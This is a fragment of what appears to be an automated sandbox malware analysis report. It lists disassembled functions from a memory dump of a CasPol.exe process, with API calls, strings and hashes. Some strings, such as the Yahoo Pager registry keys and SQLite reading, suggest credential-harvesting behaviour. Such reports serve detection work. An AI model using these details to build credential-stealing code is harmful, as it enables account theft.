                                                                                                                                                                                    • memset.MSVCRT ref: 00444573
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                    • API String ID: 1830152886-1703613266
                                                                                                                                                                                    • Opcode ID: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                                                                                                                                                                                    • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                                                                                                                                                                                    • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                                                    Function 00406D77 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                                                    • API String ID: 1670431679-1552265934
                                                                                                                                                                                    • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                    • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                                                                                                                    • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                    • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                                                                                                                    Function 00410F99 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00410FA2
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410FB0
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00410FC8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                    • API String ID: 145871493-1506664499
                                                                                                                                                                                    • Opcode ID: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
                                                                                                                                                                                    • Instruction ID: 0aecfb21e5a5e73b57ea68f7d566dfb4b74aadbd5913b1eaff8a54c705ff6fdb
                                                                                                                                                                                    • Opcode Fuzzy Hash: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
                                                                                                                                                                                    • Instruction Fuzzy Hash: F9D05B3E3026106BB6615B366C89EAFAAD5DFCA75271D0031F940E2150CB644C438D69
                                                                                                                                                                                    Function 0043DF30 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 479COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0043DFC5
                                                                                                                                                                                    • memset.MSVCRT ref: 0043DFFE
                                                                                                                                                                                    • memcpy.MSVCRT(00000001,B2850F59,00000000,?,00000001,00000000), ref: 0043E27C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                    • String ID: $no query solution
                                                                                                                                                                                    • API String ID: 368790112-326442043
                                                                                                                                                                                    • Opcode ID: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                                                                    • Instruction ID: 13ed0bad29dc8f20330308844ce1f2220340576076c9bd20db88b336710dfa55
                                                                                                                                                                                    • Opcode Fuzzy Hash: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46128A75D01619DFCB24CF9AC481AAEB7F1FF08314F14916EE895AB391D338A981CB58
                                                                                                                                                                                    Function 004309ED Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                                                                                    • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                    • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                                                                                                    • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                                                                                                    Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                    • API String ID: 2221118986-2852464175
                                                                                                                                                                                    • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                    • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                                                    • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                    • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                                                    Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                    • API String ID: 3510742995-3170954634
                                                                                                                                                                                    • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                    • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                                                    • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                                                                    Function 0041DB51 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                                                                                                    • memcmp.MSVCRT ref: 0041DBAE
                                                                                                                                                                                    • memcmp.MSVCRT ref: 0041DBDB
                                                                                                                                                                                    • memcmp.MSVCRT ref: 0041DC47
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                                                                                    • API String ID: 231171946-3708268960
                                                                                                                                                                                    • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                    • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                                                                                    Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: winWrite1$winWrite2
                                                                                                                                                                                    • API String ID: 438689982-3457389245
                                                                                                                                                                                    • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                    • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                    • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                                                    Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: winRead
                                                                                                                                                                                    • API String ID: 1297977491-2759563040
                                                                                                                                                                                    • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                    • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                                    • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                    • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                                    Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0044955B
                                                                                                                                                                                    • memset.MSVCRT ref: 0044956B
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                                                                                                    • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                    • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                    • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                                    Function 0040AB66 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                    • memset.MSVCRT ref: 0040AB9C
                                                                                                                                                                                      • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                      • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                      • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                    • API String ID: 3337535707-2769808009
                                                                                                                                                                                    • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                    • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                                                                                    Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                                                    • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                    • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                                                    Function 0040B994 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                                                                                      • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                                                                                      • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                                                                                    • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                                                                                      • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                      • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                      • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                      • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                    • SetCursor.USER32 ref: 0040B9F9
                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040BA0B
                                                                                                                                                                                    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2374668499-0
                                                                                                                                                                                    • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                                                                    • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                                                                                    • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                                                                                    Function 0040AD38 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040AD5B
                                                                                                                                                                                    • memset.MSVCRT ref: 0040AD71
                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                      • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                      • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040ADA8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                                                                                                                    • <%s>, xrefs: 0040ADA2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                    • API String ID: 3699762281-1998499579
                                                                                                                                                                                    • Opcode ID: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                                                                                    • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                                                                                                                                                    • Opcode Fuzzy Hash: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                                                                                                                                                    Function 00409A32 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: b4bc8ea3596b91dfe4b466af9048751b201f61ada43734c3eff6748fa3cff06f
                                                                                                                                                                                    • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                                                                                                                    • Opcode Fuzzy Hash: b4bc8ea3596b91dfe4b466af9048751b201f61ada43734c3eff6748fa3cff06f
                                                                                                                                                                                    • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                                                                                                                    Function 00409A98 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                                                                                                    • free.MSVCRT ref: 00409B00
                                                                                                                                                                                      • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@$free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2241099983-0
                                                                                                                                                                                    • Opcode ID: 71fd03afa15095c2d0ce6bd683e65a22e38aca543c51e447af1f15dc64016add
                                                                                                                                                                                    • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                                                                                                                    • Opcode Fuzzy Hash: 71fd03afa15095c2d0ce6bd683e65a22e38aca543c51e447af1f15dc64016add
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                                                                                                                    Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                                      • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                                      • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                                                    • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
